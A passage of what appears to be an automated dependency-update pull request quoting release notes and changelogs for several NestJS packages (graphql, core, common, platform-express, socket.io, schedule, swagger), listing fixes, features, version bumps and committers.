- [#&#8203;3889](https://redirect.github.com/nestjs/graphql/pull/3889)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
add stopOnApplicationShutdown option for graceful shutdown
([@&#8203;dgfh0450](https://redirect.github.com/dgfh0450))

##### Dependencies

- `graphql`
- [#&#8203;3894](https://redirect.github.com/nestjs/graphql/pull/3894)
fix(deps): update dependency graphql-ws to v6.0.8
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3852](https://redirect.github.com/nestjs/graphql/pull/3852)
chore(deps): update dependency graphql to v16.13.2
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3888](https://redirect.github.com/nestjs/graphql/pull/3888)
fix(deps): update dependency ws to v8.20.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3901](https://redirect.github.com/nestjs/graphql/pull/3901)
fix(deps): update dependency
[@&#8203;nestjs/mapped-types](https://redirect.github.com/nestjs/mapped-types)
to v2.1.1
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3904](https://redirect.github.com/nestjs/graphql/pull/3904)
fix(deps): update dependency lodash to v4.18.1 \[security]
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- `apollo`
- [#&#8203;3902](https://redirect.github.com/nestjs/graphql/pull/3902)
fix(deps): update dependency lodash.omit to v4.18.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3897](https://redirect.github.com/nestjs/graphql/pull/3897)
chore(deps): update dependency
[@&#8203;apollo/server](https://redirect.github.com/apollo/server) to
v5.5.0 \[security]
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3881](https://redirect.github.com/nestjs/graphql/pull/3881)
chore(deps): update dependency
[@&#8203;apollo/gateway](https://redirect.github.com/apollo/gateway) to
v2.10.5 \[security]
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- `mercurius`
- [#&#8203;3899](https://redirect.github.com/nestjs/graphql/pull/3899)
chore(deps): update dependency
[@&#8203;mercuriusjs/federation](https://redirect.github.com/mercuriusjs/federation)
to v5.1.1
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3890](https://redirect.github.com/nestjs/graphql/pull/3890)
chore(deps): update dependency fastify to v5.8.4
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3868](https://redirect.github.com/nestjs/graphql/pull/3868)
chore(deps): update dependency mercurius to v16.8.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 2

- Nicolas Guégan
([@&#8203;NicolasGn](https://redirect.github.com/NicolasGn))
- YoonDH ([@&#8203;dgfh0450](https://redirect.github.com/dgfh0450))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/common)</summary>

###
[`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

###
[`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

#### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
- [#&#8203;16762](https://redirect.github.com/nestjs/nest/pull/16762)
fix(microservices): use backing field for consumer CRASH event listener
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- [#&#8203;16764](https://redirect.github.com/nestjs/nest/pull/16764)
fix(microservices): prevent stack overflow in jsonsocket.handledata()
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/core)</summary>

###
[`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

###
[`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

##### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
- [#&#8203;16762](https://redirect.github.com/nestjs/nest/pull/16762)
fix(microservices): use backing field for consumer CRASH event listener
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- [#&#8203;16764](https://redirect.github.com/nestjs/nest/pull/16764)
fix(microservices): prevent stack overflow in jsonsocket.handledata()
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-express)</summary>

###
[`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

###
[`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

##### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
- [#&#8203;16762](https://redirect.github.com/nestjs/nest/pull/16762)
fix(microservices): use backing field for consumer CRASH event listener
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- [#&#8203;16764](https://redirect.github.com/nestjs/nest/pull/16764)
fix(microservices): prevent stack overflow in jsonsocket.handledata()
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-socket.io)</summary>

###
[`v11.1.20`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.20)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

##### v11.1.20 (2026-05-13)

##### Bug fixes

- `core`, `testing`
- [#&#8203;16939](https://redirect.github.com/nestjs/nest/pull/16939)
fix(core): fix deeply nested transient providers resolution
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))
- `core`
- [#&#8203;16861](https://redirect.github.com/nestjs/nest/pull/16861)
fix(core): fix [@&#8203;Sse](https://redirect.github.com/Sse) losing
events on complete
([@&#8203;MatthiasBrehmer](https://redirect.github.com/MatthiasBrehmer))
- [#&#8203;16753](https://redirect.github.com/nestjs/nest/pull/16753)
fix(core): defer sse writehead until after lifecycle completes
([@&#8203;jkalberer](https://redirect.github.com/jkalberer))
- [#&#8203;16782](https://redirect.github.com/nestjs/nest/pull/16782)
fix(core): use strict null check for SSE message id
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- `microservices`
- [#&#8203;16850](https://redirect.github.com/nestjs/nest/pull/16850)
fix(microservices): ServerRMQ crashes at boot when
[@&#8203;MessagePattern](https://redirect.github.com/MessagePattern)(undefined)
is combined with wildcards: true
([@&#8203;lavieennoir](https://redirect.github.com/lavieennoir))
- `common`
- [#&#8203;16845](https://redirect.github.com/nestjs/nest/pull/16845)
fix(common): accept zero timestamp in parse date pipe
([@&#8203;Mysh3ll](https://redirect.github.com/Mysh3ll))
- `platform-socket.io`
- [#&#8203;16742](https://redirect.github.com/nestjs/nest/pull/16742)
fix(socket.io): Deduplicate disconnect listener in bindMessageHandlers
([@&#8203;fru1tworld](https://redirect.github.com/fru1tworld))

##### Enhancements

- `microservices`
- [#&#8203;16676](https://redirect.github.com/nestjs/nest/pull/16676)
feat(microservices): add return buffers option for binary data
([@&#8203;Forceres](https://redirect.github.com/Forceres))
- [#&#8203;16826](https://redirect.github.com/nestjs/nest/pull/16826)
feat(microservices): handle rmq blocked/unblocked connection events
([@&#8203;thisalihassan](https://redirect.github.com/thisalihassan))
- `common`
- [#&#8203;16902](https://redirect.github.com/nestjs/nest/pull/16902)
fix(common): filetype validator buffer message
([@&#8203;QusaiAlbonni](https://redirect.github.com/QusaiAlbonni))
- `platform-express`
- [#&#8203;16844](https://redirect.github.com/nestjs/nest/pull/16844)
feat(platform-express): add defParamCharset to MulterOptions
([@&#8203;starnayuta](https://redirect.github.com/starnayuta))

##### Dependencies

- `platform-ws`
- [#&#8203;16941](https://redirect.github.com/nestjs/nest/pull/16941)
chore(deps): bump ws from 8.20.0 to 8.20.1
([@&#8203;dependabot\[bot\]](https://redirect.github.com/apps/dependabot))

##### Committers: 13

- Ali Hassan
([@&#8203;thisalihassan](https://redirect.github.com/thisalihassan))
- Burhan Haroon
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Dmytro Khyzhniak
([@&#8203;lavieennoir](https://redirect.github.com/lavieennoir))
- Harsh Rathod
([@&#8203;harshrathod50](https://redirect.github.com/harshrathod50))
- IlyaCredo ([@&#8203;Forceres](https://redirect.github.com/Forceres))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))
- Mysh3ll ([@&#8203;Mysh3ll](https://redirect.github.com/Mysh3ll))
- [@&#8203;MatthiasBrehmer](https://redirect.github.com/MatthiasBrehmer)
- [@&#8203;QusaiAlbonni](https://redirect.github.com/QusaiAlbonni)
- [@&#8203;jkalberer](https://redirect.github.com/jkalberer)
- [@&#8203;pazaderey](https://redirect.github.com/pazaderey)
- fru1tworld
([@&#8203;fru1tworld](https://redirect.github.com/fru1tworld))
- starnayuta
([@&#8203;starnayuta](https://redirect.github.com/starnayuta))

###
[`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

#### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
- [#&#8203;16762](https://redirect.github.com/nestjs/nest/pull/16762)
fix(microservices): use backing field for consumer CRASH event listener
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- [#&#8203;16764](https://redirect.github.com/nestjs/nest/pull/16764)
fix(microservices): prevent stack overflow in jsonsocket.handledata()
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/schedule (@&#8203;nestjs/schedule)</summary>

###
[`v6.1.3`](https://redirect.github.com/nestjs/schedule/releases/tag/6.1.3)

[Compare
Source](https://redirect.github.com/nestjs/schedule/compare/6.1.2...6.1.3)

#### What's Changed

- feat(cron): add initialDelay option to defer first job execution by
[@&#8203;kyungseopk1m](https://redirect.github.com/kyungseopk1m) in
[#&#8203;2251](https://redirect.github.com/nestjs/schedule/pull/2251)

**Full Changelog**:
<https://github.com/nestjs/schedule/compare/6.1.2...6.1.3>

###
[`v6.1.2`](https://redirect.github.com/nestjs/schedule/releases/tag/6.1.2)

[Compare
Source](https://redirect.github.com/nestjs/schedule/compare/6.1.1...6.1.2)

- Merge pull request
[#&#8203;2247](https://redirect.github.com/nestjs/schedule/issues/2247)
from kyungseopk1m/feat/cron-initial-delay
([`a57ce2c`](https://redirect.github.com/nestjs/schedule/commit/a57ce2c))
- chore(deps): update dependency prettier to v3.8.3
([#&#8203;2248](https://redirect.github.com/nestjs/schedule/issues/2248))
([`bb3490d`](https://redirect.github.com/nestjs/schedule/commit/bb3490d))
- feat(cron): add initialDelay option to defer first job execution
([`1c5677f`](https://redirect.github.com/nestjs/schedule/commit/1c5677f))
- Merge pull request
[#&#8203;2245](https://redirect.github.com/nestjs/schedule/issues/2245)
from nestjs/renovate/nest-monorepo
([`59046bd`](https://redirect.github.com/nestjs/schedule/commit/59046bd))
- Merge pull request
[#&#8203;2246](https://redirect.github.com/nestjs/schedule/issues/2246)
from nestjs/renovate/oxlint-monorepo
([`be4eee3`](https://redirect.github.com/nestjs/schedule/commit/be4eee3))
- chore(deps): update dependency oxlint to v1.60.0
([`32a9ce2`](https://redirect.github.com/nestjs/schedule/commit/32a9ce2))
- chore(deps): update nest monorepo to v11.1.19
([`7d3844f`](https://redirect.github.com/nestjs/schedule/commit/7d3844f))
- chore: migrate to oxlint, vitest, ts6
([`29de71b`](https://redirect.github.com/nestjs/schedule/commit/29de71b))
- chore(deps): update dependency globals to v17.5.0
([#&#8203;2244](https://redirect.github.com/nestjs/schedule/issues/2244))
([`6c62cca`](https://redirect.github.com/nestjs/schedule/commit/6c62cca))
- chore(deps): update dependency sinon to v21.1.2
([#&#8203;2243](https://redirect.github.com/nestjs/schedule/issues/2243))
([`ee3b31a`](https://redirect.github.com/nestjs/schedule/commit/ee3b31a))
- chore(deps): update dependency sinon to v21.1.1
([#&#8203;2241](https://redirect.github.com/nestjs/schedule/issues/2241))
([`eba9799`](https://redirect.github.com/nestjs/schedule/commit/eba9799))
- Merge pull request
[#&#8203;2242](https://redirect.github.com/nestjs/schedule/issues/2242)
from nestjs/renovate/prettier-3.x
([`c3ad0f7`](https://redirect.github.com/nestjs/schedule/commit/c3ad0f7))
- chore(deps): update dependency prettier to v3.8.2
([`798e2a9`](https://redirect.github.com/nestjs/schedule/commit/798e2a9))
- Merge pull request
[#&#8203;2199](https://redirect.github.com/nestjs/schedule/issues/2199)
from nestjs/renovate/cimg-node-24.x
([`a05354a`](https://redirect.github.com/nestjs/schedule/commit/a05354a))
- chore(deps): update dependency typescript-eslint to v8.58.1
([#&#8203;2240](https://redirect.github.com/nestjs/schedule/issues/2240))
([`0367ac1`](https://redirect.github.com/nestjs/schedule/commit/0367ac1))
- chore(deps): update dependency eslint to v10.2.0
([#&#8203;2239](https://redirect.github.com/nestjs/schedule/issues/2239))
([`fa93e06`](https://redirect.github.com/nestjs/schedule/commit/fa93e06))
- chore(deps): update nest monorepo to v11.1.18
([#&#8203;2238](https://redirect.github.com/nestjs/schedule/issues/2238))
([`8cd4c02`](https://redirect.github.com/nestjs/schedule/commit/8cd4c02))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to v24.12.2
([#&#8203;2237](https://redirect.github.com/nestjs/schedule/issues/2237))
([`01482df`](https://redirect.github.com/nestjs/schedule/commit/01482df))
- chore(deps): update dependency
[@&#8203;types/sinon](https://redirect.github.com/types/sinon) to
v21.0.1
([#&#8203;2236](https://redirect.github.com/nestjs/schedule/issues/2236))
([`f05b5bd`](https://redirect.github.com/nestjs/schedule/commit/f05b5bd))
- chore(deps): update dependency ts-jest to v29.4.9
([#&#8203;2235](https://redirect.github.com/nestjs/schedule/issues/2235))
([`af545e6`](https://redirect.github.com/nestjs/schedule/commit/af545e6))
- chore(deps): update dependency typescript-eslint to v8.58.0
([#&#8203;2233](https://redirect.github.com/nestjs/schedule/issues/2233))
([`4dad22a`](https://redirect.github.com/nestjs/schedule/commit/4dad22a))
- chore(deps): update node.js to v24.14.1
([`28db9bc`](https://redirect.github.com/nestjs/schedule/commit/28db9bc))
- chore(deps): update dependency eslint to v10.1.0
([#&#8203;2232](https://redirect.github.com/nestjs/schedule/issues/2232))
([`413f390`](https://redirect.github.com/nestjs/schedule/commit/413f390))
- chore(deps): update nest monorepo to v11.1.17
([#&#8203;2230](https://redirect.github.com/nestjs/schedule/issues/2230))
([`46c2bc5`](https://redirect.github.com/nestjs/schedule/commit/46c2bc5))
- chore(deps): update dependency typescript-eslint to v8.57.1
([#&#8203;2231](https://redirect.github.com/nestjs/schedule/issues/2231))
([`8fd063b`](https://redirect.github.com/nestjs/schedule/commit/8fd063b))
- chore(deps): update dependency sinon to v21.0.3
([#&#8203;2229](https://redirect.github.com/nestjs/schedule/issues/2229))
([`1671ad9`](https://redirect.github.com/nestjs/schedule/commit/1671ad9))
- chore(deps): update commitlint monorepo to v20.5.0
([#&#8203;2228](https://redirect.github.com/nestjs/schedule/issues/2228))
([`2ecd2f1`](https://redirect.github.com/nestjs/schedule/commit/2ecd2f1))
- chore(deps): update dependency lint-staged to v16.4.0
([#&#8203;2227](https://redirect.github.com/nestjs/schedule/issues/2227))
([`aa0de01`](https://redirect.github.com/nestjs/schedule/commit/aa0de01))
- chore(deps): update commitlint monorepo to v20.4.4
([#&#8203;2226](https://redirect.github.com/nestjs/schedule/issues/2226))
([`75034fe`](https://redirect.github.com/nestjs/schedule/commit/75034fe))
- chore(deps): update dependency lint-staged to v16.3.3
([#&#8203;2225](https://redirect.github.com/nestjs/schedule/issues/2225))
([`f1c7d31`](https://redirect.github.com/nestjs/schedule/commit/f1c7d31))
- chore(deps): update dependency jest to v30.3.0
([#&#8203;2224](https://redirect.github.com/nestjs/schedule/issues/2224))
([`1a208d4`](https://redirect.github.com/nestjs/schedule/commit/1a208d4))
- chore(deps): update dependency typescript-eslint to v8.57.0
([#&#8203;2223](https://redirect.github.com/nestjs/schedule/issues/2223))
([`60dd2c9`](https://redirect.github.com/nestjs/schedule/commit/60dd2c9))
- chore(deps): update dependency eslint to v10.0.3
([#&#8203;2221](https://redirect.github.com/nestjs/schedule/issues/2221))
([`791b6ba`](https://redirect.github.com/nestjs/schedule/commit/791b6ba))
- chore(deps): update dependency
[@&#8203;eslint/eslintrc](https://redirect.github.com/eslint/eslintrc)
to v3.3.5
([#&#8203;2220](https://redirect.github.com/nestjs/schedule/issues/2220))
([`0da1ca7`](https://redirect.github.com/nestjs/schedule/commit/0da1ca7))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to v24.12.0
([#&#8203;2219](https://redirect.github.com/nestjs/schedule/issues/2219))
([`934a93e`](https://redirect.github.com/nestjs/schedule/commit/934a93e))
- chore(deps): update nest monorepo to v11.1.16
([#&#8203;2218](https://redirect.github.com/nestjs/schedule/issues/2218))
([`5f44e9b`](https://redirect.github.com/nestjs/schedule/commit/5f44e9b))
- chore(deps): update dependency sinon to v21.0.2
([#&#8203;2217](https://redirect.github.com/nestjs/schedule/issues/2217))
([`b807746`](https://redirect.github.com/nestjs/schedule/commit/b807746))
- chore(deps): update dependency lint-staged to v16.3.2
([#&#8203;2216](https://redirect.github.com/nestjs/schedule/issues/2216))
([`4ca32bd`](https://redirect.github.com/nestjs/schedule/commit/4ca32bd))
- chore(deps): update commitlint monorepo to v20.4.3
([#&#8203;2215](https://redirect.github.com/nestjs/schedule/issues/2215))
([`d3ceb76`](https://redirect.github.com/nestjs/schedule/commit/d3ceb76))
- chore(deps): update nest monorepo to v11.1.15
([#&#8203;2214](https://redirect.github.com/nestjs/schedule/issues/2214))
([`b084ffc`](https://redirect.github.com/nestjs/schedule/commit/b084ffc))
- chore(deps): update dependency lint-staged to v16.3.1
([#&#8203;2213](https://redirect.github.com/nestjs/schedule/issues/2213))
([`8a201b2`](https://redirect.github.com/nestjs/schedule/commit/8a201b2))
- chore(deps): update dependency globals to v17.4.0
([#&#8203;2212](https://redirect.github.com/nestjs/schedule/issues/2212))
([`6f61793`](https://redirect.github.com/nestjs/schedule/commit/6f61793))
- chore(deps): update dependency lint-staged to v16.3.0
([#&#8203;2211](https://redirect.github.com/nestjs/schedule/issues/2211))
([`aa9213a`](https://redirect.github.com/nestjs/schedule/commit/aa9213a))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to v24.11.0
([#&#8203;2210](https://redirect.github.com/nestjs/schedule/issues/2210))
([`c70b928`](https://redirect.github.com/nestjs/schedule/commit/c70b928))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.15
([#&#8203;2209](https://redirect.github.com/nestjs/schedule/issues/2209))
([`0f596b9`](https://redirect.github.com/nestjs/schedule/commit/0f596b9))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.14
([#&#8203;2208](https://redirect.github.com/nestjs/schedule/issues/2208))
([`dac8cca`](https://redirect.github.com/nestjs/schedule/commit/dac8cca))
- chore(deps): update dependency eslint to v10.0.2
([#&#8203;2207](https://redirect.github.com/nestjs/schedule/issues/2207))
([`abe6fce`](https://redirect.github.com/nestjs/schedule/commit/abe6fce))
- chore(deps): update dependency
[@&#8203;eslint/eslintrc](https://redirect.github.com/eslint/eslintrc)
to v3.3.4
([#&#8203;2206](https://redirect.github.com/nestjs/schedule/issues/2206))
([`cb32a40`](https://redirect.github.com/nestjs/schedule/commit/cb32a40))
- chore(deps): update dependency typescript-eslint to v8.56.1
([#&#8203;2205](https://redirect.github.com/nestjs/schedule/issues/2205))
([`88e1e6c`](https://redirect.github.com/nestjs/schedule/commit/88e1e6c))
- chore(deps): update dependency eslint to v10.0.1
([#&#8203;2204](https://redirect.github.com/nestjs/schedule/issues/2204))
([`55e5406`](https://redirect.github.com/nestjs/schedule/commit/55e5406))
- chore(deps): update commitlint monorepo to v20.4.2
([#&#8203;2203](https://redirect.github.com/nestjs/schedule/issues/2203))
([`4e55d62`](https://redirect.github.com/nestjs/schedule/commit/4e55d62))
- chore(deps): update nest monorepo to v11.1.14
([#&#8203;2202](https://redirect.github.com/nestjs/schedule/issues/2202))
([`d23ea1a`](https://redirect.github.com/nestjs/schedule/commit/d23ea1a))
- chore(deps): update eslint monorepo to v10
([#&#8203;2195](https://redirect.github.com/nestjs/schedule/issues/2195))
([`c2fcbc3`](https://redirect.github.com/nestjs/schedule/commit/c2fcbc3))
- chore(deps): update dependency typescript-eslint to v8.56.0
([#&#8203;2201](https://redirect.github.com/nestjs/schedule/issues/2201))
([`a93ebc4`](https://redirect.github.com/nestjs/schedule/commit/a93ebc4))
- chore(deps): update dependency rimraf to v6.1.3
([#&#8203;2200](https://redirect.github.com/nestjs/schedule/issues/2200))
([`1906e80`](https://redirect.github.com/nestjs/schedule/commit/1906e80))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.13
([#&#8203;2198](https://redirect.github.com/nestjs/schedule/issues/2198))
([`244cb84`](https://redirect.github.com/nestjs/schedule/commit/244cb84))
- chore(deps): update dependency typescript-eslint to v8.55.0
([#&#8203;2197](https://redirect.github.com/nestjs/schedule/issues/2197))
([`6b00083`](https://redirect.github.com/nestjs/schedule/commit/6b00083))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.12
([#&#8203;2196](https://redirect.github.com/nestjs/schedule/issues/2196))
([`b310c95`](https://redirect.github.com/nestjs/schedule/commit/b310c95))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.11
([#&#8203;2194](https://redirect.github.com/nestjs/schedule/issues/2194))
([`d05dca5`](https://redirect.github.com/nestjs/schedule/commit/d05dca5))

</details>

<details>
<summary>nestjs/swagger (@&#8203;nestjs/swagger)</summary>

###
[`v11.4.2`](https://redirect.github.com/nestjs/swagger/compare/11.4.1...b0a35f3b20bedc6e6756f476cee182700a199b6e)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.1...11.4.2)

###
[`v11.4.1`](https://redirect.github.com/nestjs/swagger/compare/11.4.0...14bd8f58d6011a1be03e266e39e472be0d4d3795)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.0...11.4.1)

###
[`v11.4.0`](https://redirect.github.com/nestjs/swagger/releases/tag/11.4.0)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.3.2...11.4.0)

#### 11.4.0 (2026-04-22)

##### Features

- [#&#8203;3868](https://redirect.github.com/nestjs/swagger/pull/3868)
feat(plugin): auto-mark optional
[@&#8203;Query](https://redirect.github.com/Query) parameters as
required: false
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3725](https://redirect.github.com/nestjs/swagger/pull/3725)
feat(swagger): add OpenAPI 3.2 hierarchical tags support
([@&#8203;apt-bh](https://redirect.github.com/apt-bh))

##### Bug fixes

- [#&#8203;3874](https://redirect.github.com/nestjs/swagger/pull/3874)
fix(document-builder): accept multi-digit OpenAPI version segments
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3873](https://redirect.github.com/nestjs/swagger/pull/3873)
fix(plugin): strip regex delimiters and flags from
[@&#8203;Matches](https://redirect.github.com/Matches) patterns
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3870](https://redirect.github.com/nestjs/swagger/pull/3870)
fix(decorators): forward all OpenAPI parameter fields in
[@&#8203;ApiHeader](https://redirect.github.com/ApiHeader)
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3872](https://redirect.github.com/nestjs/swagger/pull/3872)
fix(plugin): emit [@&#8203;throws](https://redirect.github.com/throws)
descriptions as proper string literals
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3782](https://redirect.github.com/nestjs/swagger/pull/3782)
fix(schema): preserve example metadata for non-body params with named
types ([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3761](https://redirect.github.com/nestjs/swagger/pull/3761)
fix(plugin): support boolean literal types and boolean enum values
([@&#8203;lucreiss](https://redirect.github.com/lucreiss))

##### Enhancements

- [#&#8203;3865](https://redirect.github.com/nestjs/swagger/pull/3865)
feat(schema-object-factory): include class name chain in circular
dependency errors
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Committers: 4

- Lu R A ([@&#8203;lucreiss](https://redirect.github.com/lucreiss))
- Maruthan G
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- Yogeshwaran C
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [@&#8203;apt-bh](https://redirect.github.com/apt-bh)

###
[`v11.3.2`](https://redirect.github.com/nestjs/swagger/compare/11.3.1...b16a1e19a8b7161e13c01c636acf3a187eabbd06)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.3.1...11.3.2)

###
[`v11.3.1`](https://redirect.github.com/nestjs/swagger/compare/11.3.0...93744af0bb923daeebcc2b674bc7957d778d3953)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.3.0...11.3.1)

###
[`v11.3.0`](https://redirect.github.com/nestjs/swagger/releases/tag/11.3.0)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.2.7...11.3.0)

#### 11.3.0 (2026-04-15)

##### Bug fixes

- [#&#8203;3826](https://redirect.github.com/nestjs/swagger/pull/3826)
fix: support nullable field in
[@&#8203;ApiResponse](https://redirect.github.com/ApiResponse) decorator
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3784](https://redirect.github.com/nestjs/swagger/pull/3784)
fix(schema): include type field when nullable is used with allOf
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3774](https://redirect.github.com/nestjs/swagger/pull/3774)
fix enum issue
([@&#8203;SupunGeethanjana](https://redirect.github.com/SupunGeethanjana))
- [#&#8203;3798](https://redirect.github.com/nestjs/swagger/pull/3798)
fix(plugin): normalize workspace package import paths in metadata
generator ([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3821](https://redirect.github.com/nestjs/swagger/pull/3821)
fix(plugin): handle same-file type references in SWC readonly metadata
generation ([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3822](https://redirect.github.com/nestjs/swagger/pull/3822)
fix(type-helpers): eagerly apply plugin metadata properties in mapped
type helpers
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3840](https://redirect.github.com/nestjs/swagger/pull/3840)
fix: use child class type when re-declaring an inherited
[@&#8203;ApiProperty](https://redirect.github.com/ApiProperty)
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))

##### Enhancements

- [#&#8203;3449](https://redirect.github.com/nestjs/swagger/pull/3449)
feat(api-header): add example property to ApiHeader decorator
([@&#8203;leemhoon00](https://redirect.github.com/leemhoon00))
- [#&#8203;3787](https://redirect.github.com/nestjs/swagger/pull/3787)
feat(decorators): support RegExp instances in
[@&#8203;ApiProperty](https://redirect.github.com/ApiProperty)({ pattern
}) ([@&#8203;temrjan](https://redirect.github.com/temrjan))
- [#&#8203;3699](https://redirect.github.com/nestjs/swagger/pull/3699)
feat(api-body): add support for encoding in ApiBody decorator
([@&#8203;lamuertepeluda](https://redirect.github.com/lamuertepeluda))
- [#&#8203;3824](https://redirect.github.com/nestjs/swagger/pull/3824)
feat: support async patchDocumentOnRequest hook
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3834](https://redirect.github.com/nestjs/swagger/pull/3834)
feat: expose generateSchema utility for programmatic schema access
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3836](https://redirect.github.com/nestjs/swagger/pull/3836)
feat(plugin): add autoFillEnumName option to suppress duplicate enum
schemas
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3837](https://redirect.github.com/nestjs/swagger/pull/3837)
feat: merge descriptions when multiple decorators share the same HTTP
status code
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
